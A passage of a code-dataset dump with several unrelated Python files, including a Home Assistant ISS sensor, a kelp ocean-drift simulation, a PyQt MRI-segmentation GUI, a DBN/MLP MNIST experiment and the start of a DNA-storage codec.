import IssData\nfrom .const import DOMAIN\n\n_LOGGER = logging.getLogger(__name__)\n\n\nasync def async_setup_entry(\n    hass: HomeAssistant,\n    entry: ConfigEntry,\n    async_add_entities: AddEntitiesCallback,\n) -> None:\n    \"\"\"Set up the sensor platform.\"\"\"\n    coordinator: DataUpdateCoordinator[IssData] = hass.data[DOMAIN]\n\n    name = entry.title\n    show_on_map = entry.options.get(CONF_SHOW_ON_MAP, False)\n\n    async_add_entities([IssSensor(coordinator, name, show_on_map)])\n\n\nclass IssSensor(CoordinatorEntity[DataUpdateCoordinator[IssData]], SensorEntity):\n    \"\"\"Implementation of the ISS sensor.\"\"\"\n\n    def __init__(\n        self, coordinator: DataUpdateCoordinator[IssData], name: str, show: bool\n    ) -> None:\n        \"\"\"Initialize the sensor.\"\"\"\n        super().__init__(coordinator)\n        self._state = None\n        self._attr_name = name\n        self._show_on_map = show\n\n    @property\n    def native_value(self) -> int:\n        \"\"\"Return number of people in space.\"\"\"\n        return self.coordinator.data.number_of_people_in_space\n\n    @property\n    def extra_state_attributes(self) -> dict[str, Any]:\n        \"\"\"Return the state attributes.\"\"\"\n        attrs = {}\n        if self._show_on_map:\n            attrs[ATTR_LONGITUDE] = self.coordinator.data.current_location.get(\n                \"longitude\"\n            )\n            attrs[ATTR_LATITUDE] = self.coordinator.data.current_location.get(\n                \"latitude\"\n            )\n        else:\n            attrs[\"long\"] = self.coordinator.data.current_location.get(\"longitude\")\n            attrs[\"lat\"] = self.coordinator.data.current_location.get(\"latitude\")\n\n        return attrs\n","sub_path":"homeassistant/components/iss/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"7653793","text":"#!/usr/bin/env python\n\nfrom datetime import datetime, timedelta\nimport numpy as np\nimport time\n\nfrom opendrift.readers import reader_basemap_landmask\nfrom opendrift.readers import reader_ROMS_native\n# PelagicPlanktonDrift is instantiated in createAndRunSimulation() below\nfrom kelp.kelpClass import PelagicPlanktonDrift\nfrom opendrift.models.plastdrift import PlastDrift\nimport os\nfrom netCDF4 import Dataset, datetime, date2num, num2date\nimport random\nimport math\nimport glob\nfrom random import randint\n\ntry:\n    from osgeo import gdal, osr, ogr\nexcept Exception as e:\n    print(e)\n    raise ValueError('OGR library is needed to read shapefiles.')\n\n\ndef commonKelpProperties():\n    # Thallus = 0\n    # New blade / lamina = 1\n    # Stipe = 2\n    # Fragment = 3\n    # feces = 4\n\n    # Physical properties per plant part, indexed by the codes above.\n    # kelpProperties() below depends on all of these lists.\n    weights = [0.373, 0.7122, 0.4684, 0.03749, 5.908e-6]\n    areas = [0.189097, 0.1323, 0.000452, 0.0007549, 4.39e-6]\n    diameters = [0.4887, 0.410, 0.0240, 0.09807, 0.002365]\n    lengths = [0.002, 0.002, 0.984, 0.0031, 0.002365]\n    volumes = (np.asarray(areas) * np.asarray(lengths)).tolist()\n    densities = [1446.6, 1541.0, 1882, 234.99, 1035]\n    SDdensities = [401, 668.71, 403, 51.09, 48.98]\n\n    sinkspeed = [0.165, 0.074, 0.181, 0.036, 0.01]\n    sinkspeedsstd = [0.0, 0.0, 0.038, 0.020, 0.0]\n    return weights, densities, SDdensities, areas, lengths, volumes, diameters, sinkspeed, sinkspeedsstd\n\n\ndef commonDateProperties(experiment):\n    if experiment == 1:\n        startTime = datetime(2016, 5, 1, 0, 0, 0)\n        endTime = datetime(2016, 8, 1, 0, 0, 0) #8\n    if experiment == 2:\n        startTime = datetime(2016, 3, 1, 0, 0, 0)\n        endTime = datetime(2016, 5, 15, 0, 0, 0) # 5\n    if experiment == 3:\n        startTime = datetime(2015, 11, 20, 0, 0, 0)\n        endTime = datetime(2016, 4, 1, 0, 0, 0) # 4\n    if experiment == 4:\n        startTime = datetime(2016, 5, 1, 0, 0, 0)\n        endTime = datetime(2016, 8, 1, 0, 0, 0) 
#8\n    if experiment == 5:\n        startTime = datetime(2015, 8, 1, 0, 0, 0)\n        endTime = datetime(2016, 8, 1, 0, 0, 0)\n\n    return startTime, endTime\n\n\ndef kelpProperties(num, kelpTypes):\n    # Get the options of weights and densities\n    weights, densities, SDdensities, areas, lengths, volumes, diameters, sinkspeeds, sinkspeedsstd = commonKelpProperties()\n\n    # Loop over num release dates and randomly select type from provided kelpTypes list\n    # Kelptypes list contents indicate which of the indices/options you have selected in commonKelpProperties\n    # If only old blades: kelpTypes=[0]\n\n    kelpWeights = []\n    kelpDensities = []\n    kelpAreas = []\n    kelpLengths = []\n    kelpVolumes = []\n    kelpDiameters = []\n    kelpType = []\n\n    for i in range(len(num)):\n        ind = random.choice(kelpTypes)\n        kelpWeights.append(weights[ind])\n        kelpType.append(ind)\n        # Calculate a random density based on the mean and std values\n\n        # Divide STD by 3 to get the sigma value required by the function\n        stds = np.random.normal(densities[ind], SDdensities[ind] / 3.0)\n\n        kelpDensities.append(stds)\n        kelpAreas.append(areas[ind])\n        kelpVolumes.append(volumes[ind])\n        kelpDiameters.append(diameters[ind])\n        kelpLengths.append(lengths[ind])\n\n    return kelpWeights, kelpDensities, kelpAreas, kelpVolumes, kelpDiameters, kelpLengths, kelpType\n\n\ndef createOutputFilenames(experiment, polygonIndex, shapefile, verticalBehavior):\n    startTime, endTime = commonDateProperties(experiment)\n    startDate = ''\n    if startTime.day < 10:\n        startDate += '0%s' % (startTime.day)\n    else:\n        startDate += '%s' % (startTime.day)\n\n    if startTime.month < 10:\n        startDate += '0%s' % (startTime.month)\n    else:\n        startDate += '%s' % (startTime.month)\n\n    startDate += '%s' % (startTime.year)\n\n    endDate = ''\n    if endTime.day < 10:\n        endDate += '0%s' % (endTime.day)\n    else:\n        endDate += '%s' % (endTime.day)\n\n    if endTime.month < 10:\n        endDate += '0%s' % (endTime.month)\n    else:\n        endDate += '%s' % (endTime.month)\n\n    endDate += '%s' % (endTime.year)\n\n    # Special file naming for KINO. 
Each layer has name 'species.shp' and we want the species name only.\n    head, tail = os.path.split(shapefile)\n\n    specie = \"Kelp\"\n    outputFilename = 'results/%s_polygon_%s_experiment_%s_%s_to_%s.nc' % (\n        specie, polygonIndex, experiment, startDate, endDate)\n    animationFilename = 'figures/%s_polygon_%s_experiment_%s_%s_to_%s.mp4' % (\n        specie, polygonIndex, experiment, startDate, endDate)\n    plotFilename = 'figures/%s_polygon_%s_experiment_%s_%s_to_%s.png' % (\n        specie, polygonIndex, experiment, startDate, endDate)\n\n    if not os.path.exists('figures'):\n        os.makedirs('figures')\n    if not os.path.exists('results'):\n        os.makedirs('results')\n    return outputFilename, animationFilename, plotFilename\n\n\ndef createAndRunSimulation(use_svim, experiment, mapResolution, interMethod, lowDepth, highDepth, layer, polygonIndex,\n                           shapefile, outputFilename, animationFilename, plotFilename, kinoDirectory, pattern_kino,\n                           svimfiles2015, svimfiles2016, verticalBehavior, allNum,\n                           allReleaseTimes, allKelpWeights, allKelpDensities, allKelpAreas, allKelpVolumes,\n                           allKelpDiameters, allKelpLengths, allKelpTypes):\n    # Setup a new simulation\n    o = PelagicPlanktonDrift(loglevel=1) # Set loglevel to 0 for debug information\n    startTime, endTime = commonDateProperties(experiment)\n\n    allKelpWeights_flat = [item for sublist in allKelpWeights for item in sublist]\n    allKelpDensities_flat = [item for sublist in allKelpDensities for item in sublist]\n    allReleaseTimes_flat = [item for sublist in allReleaseTimes for item in sublist]\n    allKelpAreas_flat = [item for sublist in allKelpAreas for item in sublist]\n    allKelpVolumes_flat = [item for sublist in allKelpVolumes for item in sublist]\n    allKelpDiameters_flat = [item for sublist in allKelpDiameters for item in sublist]\n    allKelpLengths_flat = [item for sublist in allKelpLengths for item in sublist]\n    allKelpTypes_flat = [item for sublist in allKelpTypes for item in sublist]\n\n    allNum_flat = [item for sublist in allNum for item in sublist]\n\n    print(\"=> Simulation will release a total of %s particles\\n\" % (np.sum(allNum_flat)))\n\n    # Randomly distribute the particles at depths varying between lowDepth and highDepth\n    depths = [randint(lowDepth, highDepth) for i in range(len(allNum_flat))]\n\n    #######################\n    # Preparing readers\n    #######################\n    reader_basemap = reader_basemap_landmask.Reader(\n        llcrnrlon=15, llcrnrlat=68,\n        urcrnrlon=23, urcrnrlat=74,\n        resolution=mapResolution, projection='merc')\n    o.add_reader([reader_basemap]) # Do not include basemap when stranding is deactivated\n\n    reader_kino = reader_ROMS_native.Reader([s for s in pattern_kino])\n    reader_kino.interpolation = interMethod\n\n    if use_svim:\n        reader_svim2015 = reader_ROMS_native.Reader(svimfiles2015)\n        reader_svim2015.interpolation = interMethod\n        reader_svim2016 = reader_ROMS_native.Reader(svimfiles2016)\n        reader_svim2016.interpolation = interMethod\n\n        o.add_reader([reader_kino, reader_svim2016, reader_svim2015])\n    else:\n        o.add_reader([reader_kino])\n\n    #######################\n    # Adjusting configuration\n    #######################\n    o.set_config('processes:turbulentmixing', True)\n    o.set_config('turbulentmixing:diffusivitymodel', 'windspeed_Sundby1983')\n    o.set_config('turbulentmixing:timestep', 1) # seconds\n    o.set_config('turbulentmixing:verticalresolution', 1) # default is 1 meter, but since we have longer timestep we justify it\n    o.set_config('processes:verticaladvection', True)\n    o.set_config('turbulentmixing:TSprofiles', False)\n    
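# cap the number of iterations of the vertical-mixing loop per model time step\n    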
o.set_config('turbulentmixing:max_iterations', 100)\n\n o.set_config('drift:scheme', 'euler')\n o.set_config('general:coastline_action', 'previous') # Prevent stranding, jump back to previous position\n print(o)\n\n # depths=[randint(lowDepth,highDepth) for i in xrange(len(allKelpWeights))]\n allNum_flat = list(map(int, allNum_flat))\n for i, nums in enumerate(allNum_flat):\n\n if nums <= 0:\n continue\n print(\"Running i=%s num=%s and polygon=%s\" % (i, nums, polygonIndex))\n\n o.seed_from_shapefile(shapefile, allNum_flat[i], featurenum=[polygonIndex],\n z=\"seafloor+1\", # depths[i],\n weight=allKelpWeights_flat[i],\n density=allKelpDensities_flat[i],\n area=allKelpAreas_flat[i],\n volume=allKelpVolumes_flat[i],\n diameter=allKelpDiameters_flat[i],\n length=allKelpLengths_flat[i],\n time=allReleaseTimes_flat[i],\n plantpart=allKelpTypes_flat[i])\n\n # reader_basemap.plot()\n\n #########################\n # Run the model\n #########################\n # o.plot()\n\n o.run(end_time=endTime, time_step=timedelta(hours=2),\n outfile=outputFilename)\n # export_variables=['lon', 'lat', 'z','temp','length','weight','survival'])\n # print o\n\n\ndef setupSeed(seedCount, intervalHours, startTime, endTime, startReleaseTime, endReleaseTime, releaseParticles):\n ##################################################\n # Create seed variation as function of day\n # Called multiple times from setupSeedsForExperiment\n ##################################################\n\n difference = endTime - startTime\n hoursOfSimulation = divmod(difference.total_seconds(), 3600)\n\n difference = endReleaseTime - startReleaseTime\n hoursOfRelease = divmod(difference.total_seconds(), 3600)\n\n timeStepsSimulation = int(int(hoursOfSimulation[0]) / 3)\n\n # print \"=>Release: Simulated Release will run for %s simulation hours\\n initiated on %s and ending on %s\"%(timeStepsSimulation,startReleaseTime,endReleaseTime)\n\n interval = timedelta(hours=intervalHours)\n hoursPerRelease = divmod(interval.total_seconds(), 3600) # hours per Release event\n timeStepsRelease = int(int(hoursOfRelease[0]) / int(hoursPerRelease[0])) # number of Release timesteps\n ReleaseTimes = [startReleaseTime + interval * n for n in range(timeStepsRelease)] # times of Release\n\n # num=np.random.normal(releaseParticles,int(releaseParticles/2)-1, size=len(ReleaseTimes)).astype(int)\n num = [releaseParticles for n in range(timeStepsRelease)]\n # num=np.sort(num) #sort particles in increasing order\n\n print(\"=> Seed episode: %s => Release of %s kelp particles\" % (seedCount, np.sum(num)))\n\n return num, ReleaseTimes\n\n\ndef setupSeedsForExperiment(experiment, releaseParticles):\n print(\"\\nSeed setup started --------\")\n seedCount = 1\n allNum = []\n allReleaseTimes = []\n allKelpProps = []\n allKelpWeights = []\n allKelpDensities = []\n allKelpAreas = []\n allKelpVolumes = []\n allKelpDiameters = []\n allKelpLengths = []\n allKelpTypes = []\n\n # Batch one : Old lamina (77%) released evenly 6 times a day between 122 and 135. 
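(note: as coded, this batch is seeded over the full experiment window)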
\n    startTime, endTime = commonDateProperties(experiment)\n    startReleaseTime = startTime\n    endReleaseTime = endTime\n\n    intervalHours = 6\n    print(\"=> Release: daily: %s to %s\" % (startReleaseTime, endReleaseTime))\n\n    num, ReleaseTimes = setupSeed(seedCount, intervalHours, startTime, endTime, startReleaseTime, endReleaseTime,\n                                  releaseParticles)\n    allNum.append(num)\n    allReleaseTimes.append(ReleaseTimes)\n    seedCount += 1\n\n    # Release only old blades\n    kelpTypes = [0]\n    kelpWeights, kelpDensities, kelpAreas, kelpVolumes, kelpDiameters, kelpLengths, kelpTypes = kelpProperties(num,\n                                                                                                              kelpTypes)\n    allKelpDensities.append(kelpDensities)\n    allKelpWeights.append(kelpWeights)\n    allKelpAreas.append(kelpAreas)\n    allKelpVolumes.append(kelpVolumes)\n    allKelpDiameters.append(kelpDiameters)\n    allKelpLengths.append(kelpLengths)\n    allKelpTypes.append(kelpTypes)\n    # Batch two : New lamina (23%) released evenly 6 times a day once a week \n    # Find the number of weeks between start and stop\n    num_of_weeks = int(math.ceil((endTime - startTime).days / 7.0))\n\n    # Release once per week\n    for week in range(int(num_of_weeks) - 1):\n        dayN = week * 7\n        startReleaseTime = startTime + timedelta(days=dayN)\n        endReleaseTime = startTime + timedelta(days=dayN + 1)\n        print(\"=> Release: weekly: %s to %s\" % (startReleaseTime, endReleaseTime))\n        intervalHours = 6\n\n        num, ReleaseTimes = setupSeed(seedCount, intervalHours, startTime, endTime, startReleaseTime, endReleaseTime,\n                                      releaseParticles)\n        allNum.append(num)\n        allReleaseTimes.append(ReleaseTimes)\n\n        seedCount += 1\n        # Define the properties of kelp to be released in batch 2\n        # new blades, stipes, and fragments (in equal counts - check with Eli)\n        kelpTypes = [1, 2, 3, 4]\n        kelpWeights, kelpDensities, kelpAreas, kelpVolumes, kelpDiameters, kelpLengths, kelpTypes = kelpProperties(num,\n                                                                                                                   kelpTypes)\n        allKelpDensities.append(kelpDensities)\n        allKelpWeights.append(kelpWeights)\n        allKelpAreas.append(kelpAreas)\n        allKelpVolumes.append(kelpVolumes)\n        allKelpDiameters.append(kelpDiameters)\n        allKelpLengths.append(kelpLengths)\n        allKelpTypes.append(kelpTypes)\n\n    print(\"Seed setup done --------\\n\")\n    # Return the total number of particles per release date\n    return allNum, allReleaseTimes, allKelpWeights, allKelpDensities, allKelpAreas, allKelpVolumes, allKelpDiameters, allKelpLengths, allKelpTypes\n\n\n#########################\n# SETUP FOR KELP PROJECT\n#########################\n\nrunLocally = True\nexperiments = [5]\nreleaseParticles = 5\n\nfor experiment in experiments:\n    lowDepth, highDepth = -4, -2 # in negative meters\n    verticalBehavior = False\n    startTime, endTime = commonDateProperties(experiment)\n\n    kinoDirectory = '/imr/vol1/NorFjords5/Malangen-160m_AUG2015-AUG2016/'\n    if runLocally:\n        kinoDirectory = \"/Volumes/home/CloudStation/NorFjord/\"\n\n    #if (startTime.year Using shapefile %s\" % shapefile)\n    s = ogr.Open(shapefile)\n\n    # Find all kelp polygons in Shapefile\n    for layer in s:\n        polygons = [x + 1 for x in range(layer.GetFeatureCount() - 1)]\n        polygons=[13] # debug override: run only polygon 13\n\n        print(('Running for layer with %s features' % (layer.GetFeatureCount())))\n        # Loop over all kelp polygons, releasing kelp and tracking their drift, writing results to file\n        for polygonIndex in polygons:\n\n            feature = layer.GetFeature(polygonIndex - 1)\n\n            print(\"Kelp area %s for polygon %s\" % (feature.GetGeometryRef().GetArea(), polygonIndex))\n            geom = feature.GetGeometryRef()\n            points = geom.GetGeometryCount()\n            ring = geom.GetGeometryRef(0)\n\n            if ring.GetPointCount() > 3:\n                outputFilename, 
animationFilename, plotFilename = createOutputFilenames(experiment, polygonIndex,\n                                                                                     shapefile, verticalBehavior)\n\n                print(\"Result files will be stored as:\\nnetCDF=> %s\\nmp4=> %s\" % (outputFilename, animationFilename))\n\n                print(\"Starting simulations....\")\n                createAndRunSimulation(use_svim, experiment, mapResolution, interMethod, lowDepth, highDepth,\n                                       layer, polygonIndex, shapefile,\n                                       outputFilename, animationFilename, plotFilename,\n                                       kinoDirectory, pattern_kino, svimfiles2015, svimfiles2016,\n                                       verticalBehavior, allNum, allReleaseTimes, allKelpWeights,\n                                       allKelpDensities, allKelpAreas, allKelpVolumes, allKelpDiameters, allKelpLengths,\n                                       allKelpTypes)\n","sub_path":"Kelp/kelp_experiment_v1.py","file_name":"kelp_experiment_v1.py","file_ext":"py","file_size_in_byte":17835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"513255448","text":"from market_simulator import MarketSimulator,DataLoader,MarketDAOImpl,AmeritradeAdapter,SMAPreprocessor,SMADAOImpl,HighChartsAdapter\nfrom params_config import config\nimport sys\nsys.dont_write_bytecode=True\n\n\ndef main():\n    \n    stockSymbols = config['stockSymbols']\n    strategyTypes = config['strategyType'] \n\n    preprocessors = []\n\n    simulator = MarketSimulator()\n\n    for i in range(len(strategyTypes)):\n        if strategyTypes[i] == 'sma':\n            if config['chartingTool'] == 'HighCharts':\n                preprocessors.append('SMAPreprocessor(HighChartsAdapter)')\n\n    simulator.loadSymbols(stockSymbols)\n    simulator.loadStrategyTypes(preprocessors)\n\n\n    if config['database'] == 'POSTGRESQL':\n        simulator.setMarketDAO('PostgreMarketDAO')\n    else:\n        print('build_failed')\n\n\n    if config['provider'] == 'Ameritrade':\n        simulator.setReader('HighChartsAdapter')\n    else:\n        print('build_failed')\n\n\n    simulator.run()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"202368966","text":"import os\nimport re\nimport traceback\n\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\nfrom core.loadData import loadData, updateCachedData\nfrom core.runSegmentation import runSegmentation\nfrom generated import mainWindow_ui\nfrom gui.configureWindow_TexasTechDixon import ConfigureWindow as ConfigureWindowTexasTechDixon\nfrom gui.configureWindow_WashUDixon import ConfigureWindow as ConfigureWindowWashUDixon\nfrom gui.configureWindow_WashUUnknown import ConfigureWindow as ConfigureWindowWashUUnknown\nfrom util import constants\nfrom util.enums import ScanFormat\nfrom util.fileDialog import FileDialog\n\n\nclass MainWindow(QMainWindow, mainWindow_ui.Ui_MainWindow):\n    def __init__(self, parent=None):\n        super(MainWindow, self).__init__(parent)\n        self.setupUi(self)\n\n        self.sourceModel = QStandardItemModel(self.sourceListView)\n        self.sourceListView.setModel(self.sourceModel)\n\n        # Load the combo box with the data types defined in ScanFormat enumeration\n        self.dataTypeComboBox.addItems([str(item) for item in ScanFormat])\n\n        self.loadSettings()\n\n    def loadSettings(self):\n        settings = QSettings(constants.applicationName, constants.organizationName)\n        settings.beginGroup('mainWindow')\n\n        geometry = settings.value('geometry', QByteArray(), type=QByteArray)\n        if not geometry.isEmpty():\n            self.restoreGeometry(geometry)\n\n        # Fixes QTBUG-46620 issue\n        if settings.value('maximized', False, type=bool):\n            self.showMaximized()\n            
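# re-apply the available desktop geometry so the maximized window is sized correctly\n            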
self.setGeometry(QApplication.desktop().availableGeometry(self))\n\n        self.defaultOpenPath = settings.value('defaultOpenPath', QDir.homePath())\n\n        settings.endGroup()\n\n    def saveSettings(self):\n        settings = QSettings(constants.applicationName, constants.organizationName)\n        settings.beginGroup('mainWindow')\n\n        settings.setValue('geometry', self.saveGeometry())\n        settings.setValue('maximized', self.isMaximized())\n        settings.setValue('defaultOpenPath', self.defaultOpenPath)\n\n        settings.endGroup()\n\n    def selectFormatFromDirectory(self, directory):\n        match = re.match(r'^MF03([\\d]*)[-_]((POST)|(PRE))', os.path.basename(directory))\n\n        format = (ScanFormat.WashUUnknown if int(match.group(1)) < 12 else ScanFormat.WashUDixon) \\\n            if match else ScanFormat.TexasTechDixon\n\n        self.dataTypeComboBox.setCurrentIndex(format.value)\n\n    @pyqtSlot()\n    def on_browseSourceButton_clicked(self):\n        directories = FileDialog.getExistingDirectories(self, 'Select source folders of subjects', self.defaultOpenPath)\n\n        # Nothing was selected\n        if not directories:\n            return\n\n        # Save the last directory used\n        self.defaultOpenPath = os.path.dirname(directories[0])\n\n        # Check each of the directories and make sure they are valid\n        # Skip adding that row if it isn't valid\n        hasError = False\n        for directory in directories:\n            if not os.path.isdir(directory):\n                hasError = True\n                continue\n\n            self.sourceModel.appendRow(QStandardItem(directory))\n\n        # If this is the first set of items added to the list, select the first item\n        if self.sourceModel.rowCount() > 0 and not self.sourceListView.currentIndex().isValid():\n            self.sourceListView.setCurrentIndex(self.sourceModel.index(0, 0))\n            self.sourceListView.setFocus()\n\n        # Select the appropriate data format based on directory contents\n        # Only do this if this is the first item added, makes it easier for the user not to have to change this\n        if self.sourceModel.rowCount() > 0:\n            self.selectFormatFromDirectory(directories[0])\n\n        # If an error occurred, tell the user that the directory was not added\n        if hasError:\n            QMessageBox.critical(self, 'Invalid directory',\n                                 'One of the directories you chose was invalid. It was not added to the list')\n\n    @pyqtSlot()\n    def on_runButton_clicked(self):\n        # If there are no source files, then return\n        if self.sourceModel.rowCount() == 0:\n            QMessageBox.warning(self, 'No source directories', 'There are no source directories in the list currently. '\n                                                               'Please add some folders before converting.')\n            return\n\n        # Get the scan format\n        format = ScanFormat(self.dataTypeComboBox.currentIndex())\n\n        # Loop through each row in the list view\n        for i in range(self.sourceModel.rowCount()):\n            # Get the data path for the row\n            dataPath = self.sourceModel.item(i).text()\n\n            print('Beginning segmentation for %s' % dataPath)\n\n            # Attempt to load the data from the data path\n            try:\n                data = loadData(dataPath, format, self.cacheDataCheckbox.isChecked())\n            except Exception:\n                print('Unable to load data from %s. Skipping...' % dataPath)\n                print(traceback.format_exc())\n                continue\n\n            # Set constant pathDir to be the current data path to allow writing/reading from the current directory\n            constants.pathDir = dataPath\n\n            # Run segmentation algorithm\n            try:\n                runSegmentation(data, format)\n                pass\n            except Exception:\n                print('Unable to run segmentation algorithm on %s. Skipping...' 
% dataPath)\n                print(traceback.format_exc())\n                continue\n\n        print('Segmentation complete!')\n\n    @pyqtSlot()\n    def on_configureButton_clicked(self):\n        selectedIndices = self.sourceListView.selectedIndexes()\n\n        if self.sourceModel.rowCount() == 0:\n            QMessageBox.warning(self, 'No source directories', 'There are no source directories in the list currently. '\n                                                               'Please add some folders before converting.')\n            return\n        elif len(selectedIndices) == 0:\n            QMessageBox.warning(self, 'No selected source directories', 'There are no source directories selected '\n                                                                        'currently. Please select one.')\n            return\n        elif len(selectedIndices) != 1:\n            QMessageBox.warning(self, 'Multiple selected directories', 'There are currently more than one directories '\n                                                                       'selected to configure. Please select only one.')\n            return\n\n        # Get the scan format\n        format = ScanFormat(self.dataTypeComboBox.currentIndex())\n\n        # Get selected index text\n        dataPath = selectedIndices[0].data()\n\n        # Attempt to load the data from the data path\n        try:\n            data = loadData(dataPath, format, self.cacheDataCheckbox.isChecked())\n        except Exception:\n            print('Unable to load data from %s. Skipping...' % dataPath)\n            print(traceback.format_exc())\n            return\n\n        if format == ScanFormat.TexasTechDixon:\n            configureWindow = ConfigureWindowTexasTechDixon(data, dataPath, parent=self)\n            configureWindow.exec()\n        elif format == ScanFormat.WashUUnknown:\n            configureWindow = ConfigureWindowWashUUnknown(data, dataPath, parent=self)\n            configureWindow.exec()\n        elif format == ScanFormat.WashUDixon:\n            configureWindow = ConfigureWindowWashUDixon(data, dataPath, parent=self)\n            configureWindow.exec()\n        else:\n            raise ValueError('Format must be a valid ScanFormat option')\n\n        # Update the cached data if it was cached\n        if self.cacheDataCheckbox.isChecked():\n            updateCachedData(dataPath, configureWindow.getData())\n\n    @pyqtSlot()\n    def closeEvent(self, closeEvent):\n        # Save settings when the window is closed\n        self.saveSettings()\n","sub_path":"gui/mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":8065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"279410045","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 23 10:46:09 2018\r\n\r\n@author: Alexandre Boyker\r\n\"\"\"\r\nfrom helper import get_MNIST_data \r\nfrom tf_helper import reset_graph\r\nfrom dbn import DBN\r\nfrom mlp import MLP\r\nfrom sklearn.model_selection import train_test_split\r\nfrom argparse import ArgumentParser\r\n\r\n\r\nparser = ArgumentParser()\r\nparser.add_argument(\"-bt\", \"--train_bool\", dest=\"train_bool\",\r\n                    help=\" training for dbn boolean, default=False\", type=bool, default=False)\r\n\r\nargs = parser.parse_args()\r\ntrain_bool = args.train_bool\r\n\r\n\r\n\r\n\r\ndef main():\r\n    \r\n    reset_graph()\r\n    #get MNIST dataset, validation set is 10% of total samples (each class is equally represented)\r\n    X_train, X_val, y_train, y_val = get_MNIST_data()\r\n    # parameters for Deep Belief Network training\r\n    # We use layers of size 784 - 500 - 500 - 2000, as they are known to work best\r\n    param = {'batch_size':100,'n_epochs':25, 'model_name':\"dbn_MNIST\", 'layers_size': [X_train.shape[1] ,500, 500, 2000]}\r\n    dbn = DBN(**param)\r\n    # train the dbn\r\n    if train_bool:\r\n        \r\n        dbn.train(X_train)\r\n        \r\n    # get the weights of the DBN\r\n    weights_dict = dbn.get_weights()\r\n    initial_weights = [weights_dict[\"hidden_layer_0\"][\"W\"], weights_dict[\"hidden_layer_1\"][\"W\"], 
weights_dict[\"hidden_layer_2\"][\"W\"], \"default\"]\r\n initial_bias = [weights_dict[\"hidden_layer_0\"][\"b\"], weights_dict[\"hidden_layer_1\"][\"b\"], weights_dict[\"hidden_layer_2\"][\"b\"], \"default\"]\r\n \r\n \r\n # we split the validation set of MNIST 2% for training and 98 % for validation\r\n X_train, X_val, y_train, y_val = train_test_split(X_val, y_val, test_size=0.98, random_state=23)\r\n \r\n # MLP trainng with DBN weights for initialization\r\n print(\"\\n\\n MLP trained with DBN weights\")\r\n param_dict = {'n_epochs':400,'layers_size' :[784, 500, 500, 2000, 10],'initial_bias':initial_bias, 'initial_weights':initial_weights, 'model_name':'mlp_dbn_ini'}\r\n mlp = MLP(**param_dict)\r\n \r\n\r\n mlp.train(X_train, y_train, X_val, y_val)\r\n \r\n # MLP training with random Gaussian weights for initialization\r\n print(\"\\n\\nMLP trained with random standard Gaussian weights\")\r\n\r\n param_dict = {'n_epochs':400,'layers_size' :[784, 500, 500, 2000, 10],'initial_bias':None, 'initial_weights':None, 'model_name':'mlp_random_ini'}\r\n mlp = MLP(**param_dict)\r\n mlp.train(X_train, y_train, X_val, y_val)\r\n\r\nif __name__ == '__main__':\r\n \r\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"96543341","text":"\"\"\"\nName: Simple Codec (Simple DNA Storage Code)\n\nReference:\nChurch G M, Gao Y, Kosuri S. Next-generation digital information storage in DNA[J]. Science, 2012, 337(6102): 1628-1628.\n\nCoder: HaoLing ZHANG (BGI-Research)[V1]\n\nCurrent Version: 1\n\nFunction(s):\n(1) DNA encoding by Simple.\n(2) DNA decoding by Simple.\n\"\"\"\nimport random\nimport sys\n\nimport Chamaeleo.utils.monitor as monitor\nimport Chamaeleo.utils.log as log\nimport Chamaeleo.methods.components.inherent as inherent\n\n\n# noinspection PyMethodMayBeStatic,PyProtectedMember\nclass SC:\n def __init__(self, mapping_rule=None):\n \"\"\"\n introduction: The initialization method of Simple Codec.\n\n :param mapping_rule: Mapping between bases and numbers.\n There can be two settings:\n (1) Two bases correspond to a number (0 or 1): i.e. AT-0, CG-1.\n (2) Each base corresponds to a number: i.e. 
A-00, T-01, C-10, G-11.\n \"\"\"\n\n if not mapping_rule:\n mapping_rule = [0, 1, 1, 0]\n\n self.mapping_rule = mapping_rule\n\n self._init_check()\n\n self.file_size = 0\n self.m = monitor.Monitor()\n\n def _init_check(self):\n \"\"\"\n introduction: The verification of initialization parameters.\n \"\"\"\n if 0 <= min(self.mapping_rule) and max(self.mapping_rule) <= 1:\n if self.mapping_rule.count(0) != 2 or self.mapping_rule.count(1) != 2:\n log.output(log.ERROR, str(__name__), str(sys._getframe().f_code.co_name),\n \"Mapping rule is wrong!\")\n else:\n if (0 not in self.mapping_rule) or (1 not in self.mapping_rule) \\\n or (2 not in self.mapping_rule) or (3 not in self.mapping_rule):\n log.output(log.ERROR, str(__name__), str(sys._getframe().f_code.co_name),\n \"Mapping rule is wrong!\")\n\n # ================================================= encode part ====================================================\n\n def encode(self, matrix, size, need_log=False):\n \"\"\"\n introduction: Encode DNA sequences from the data of binary file.\n\n :param matrix: Generated binary two-dimensional matrix.\n The data of this matrix contains only 0 or 1 (non-char).\n Type: int or bit.\n\n :param size: This refers to file size, to reduce redundant bits when transferring DNA to binary files.\n Type: int\n\n :param need_log: Show the log.\n\n :return dna_sequences: The DNA sequence of len(matrix) rows.\n Type: list(string).\n \"\"\"\n self.file_size = size\n\n self.m.restore()\n\n if need_log:\n log.output(log.NORMAL, str(__name__), str(sys._getframe().f_code.co_name),\n \"Encode the matrix by Simple Codec.\")\n\n dna_sequences = []\n for row in range(len(matrix)):\n if need_log:\n self.m.output(row, len(matrix))\n dna_sequences.append(self._list_to_sequence(matrix[row]))\n\n return dna_sequences\n\n def _list_to_sequence(self, one_list):\n \"\"\"\n introduction: from one binary list to DNA sequence.\n\n :param one_list: One binary list.\n Type: int or bit.\n\n :return dna_sequence: One DNA sequence.\n Type: List(char).\n \"\"\"\n dna_sequence = []\n if 3 in self.mapping_rule:\n # unlimited mapping rule.\n if len(one_list) % 2 != 0:\n log.output(log.ERROR, 